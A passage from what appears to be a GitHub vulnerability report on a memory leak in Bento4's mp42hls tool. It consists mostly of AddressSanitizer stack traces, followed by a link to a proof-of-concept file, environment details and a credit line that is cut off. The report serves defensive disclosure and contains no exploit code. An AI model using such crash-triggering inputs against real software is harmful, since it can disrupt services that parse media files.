object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4b9f41 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4b9f41) #3 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #4 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #5 0x4fbb89 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fbb89) #6 0x4c48ca in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c48ca) #7 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #8 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #9 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #10 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #11 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #12 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #13 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 88 byte(s) in 1 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x537d62 in AP4_EsdsAtom::Create(unsigned int, AP4_ByteStream&) (/test_mp42hls/mp42hls+0x537d62) #3 0x4bb623 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4bb623) #4 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #5 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #6 0x672a2e in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x672a2e) #7 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #8 0x6c5538 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x6c5538) #9 0x6c48d2 in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x6c48d2) #10 0x4ba8b3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4ba8b3) #11 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #12 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #13 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #14 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #15 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #16 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #17 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #18 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #19 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #20 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #21 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #22 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #23 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #24 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #25 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 88 byte(s) in 1 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4ba751 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4ba751) #3 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #4 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #5 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #6 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #7 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #8 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #9 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 80 byte(s) in 1 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #3 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #4 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #5 0x4fbb89 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fbb89) #6 0x4c48ca in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c48ca) #7 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #8 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #9 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #10 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #11 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #12 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #13 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 80 byte(s) in 1 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x78dd17 in AP4_MetaDataAtomTypeHandler::CreateAtom(unsigned int, unsigned int, AP4_ByteStream&, unsigned int, AP4_Atom*&) (/test_mp42hls/mp42hls+0x78dd17) #3 0x4c511b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c511b) #4 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #5 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #6 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #7 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #8 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #9 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #10 0x4fbb89 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fbb89) #11 0x4c48ca in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c48ca) #12 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #13 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #14 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #15 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #16 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #17 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #18 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 80 byte(s) in 1 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4c48ca in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c48ca) #3 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #4 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #5 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #6 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #7 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #8 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #9 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 80 byte(s) in 1 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4bb0c3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4bb0c3) #3 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #4 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #5 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #6 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #7 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #8 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #9 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #10 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #11 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #12 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #13 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #14 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #15 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #16 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #17 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 80 byte(s) in 1 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4bdf2b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4bdf2b) #3 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #4 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #5 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #6 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #7 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #8 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #9 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #10 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #11 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #12 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #13 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #14 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #15 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #16 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #17 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 80 byte(s) in 1 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #3 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #4 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #5 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #6 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #7 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #8 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #9 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) …… Indirect leak of 20 byte(s) in 1 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x6b73af in AP4_StscAtom::Create(unsigned int, AP4_ByteStream&) (/test_mp42hls/mp42hls+0x6b73af) #3 0x4baa0b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4baa0b) #4 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #5 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #6 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #7 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #8 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #9 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #10 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #11 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #12 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #13 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #14 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #15 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #16 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #17 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #18 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 4 byte(s) in 1 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x5ab4ab in AP4_MdhdAtom::Create(unsigned int, AP4_ByteStream&) (/test_mp42hls/mp42hls+0x5ab4ab) #3 0x4ba751 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4ba751) #4 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #5 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #6 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #7 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #8 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #9 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #10 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) SUMMARY: AddressSanitizer: 5306 byte(s) leaked in 88 allocation(s). ``` # POC [mp42hls-poc.zip](https://github.com/axiomatic-systems/Bento4/files/9618647/mp42hls-poc.zip) # Environment Ubuntu 18.04.6 LTS (docker) clang 12.0.1 clang++ 12.0.1 Bento4 master branch(5b7cc25) && Bento4 release version([1.6.0-639](https://www.bok.net/Bento4/binaries/Bento4-SDK-1-6-0-639.x86_64-unknown-linux.zip)) # Credit Xudong Cao ([NCNIPC of China](http://www.nipc.org.cn/)), (Zhongguancun Laboratory) Mengyue Feng ([NCNIPC of 